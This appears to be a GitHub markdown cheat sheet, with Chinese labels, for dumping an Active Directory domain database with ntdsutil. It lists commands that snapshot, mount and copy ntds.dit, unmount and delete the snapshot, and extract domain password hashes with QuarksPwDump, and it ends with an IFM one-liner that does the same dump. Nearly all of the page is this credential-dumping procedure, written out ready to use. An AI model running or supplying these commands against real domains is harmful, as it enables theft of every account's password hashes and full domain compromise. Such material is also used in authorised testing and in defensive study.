Skip to content

Latest commit

 

History

History
24 lines (24 loc) · 643 Bytes

Ntdsutil.md

File metadata and controls

24 lines (24 loc) · 643 Bytes
>ntdsutil
>snapshot
>activate instance ntds
>create
>mount {guid}
>copy 装载点\windows\NTDS\ntds.dit d:\ntds_save.dit
>unmount {guid}
>delete {guid}
>quit
&
创建
> ntdsutil snapshot "activate instance ntds" create quit quit
挂载
> ntdsutil snapshot "mount {guid}" quit quit
复制
>copy c:\$SNAP_XXX_VOLUMEC$\windows\NTDS\ntds.dit d:\ntds_save.dit
卸载并删除
> ntdsutil snapshot "unmounts {guid}" "delete {guid}" quit quit
删除后检测
> ntdsutil snapshot "List All" quit quit
提取hash
> QuarksPwDump -dump-hash-domain -ntds-file d:\ntds_save.dit
&
>ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q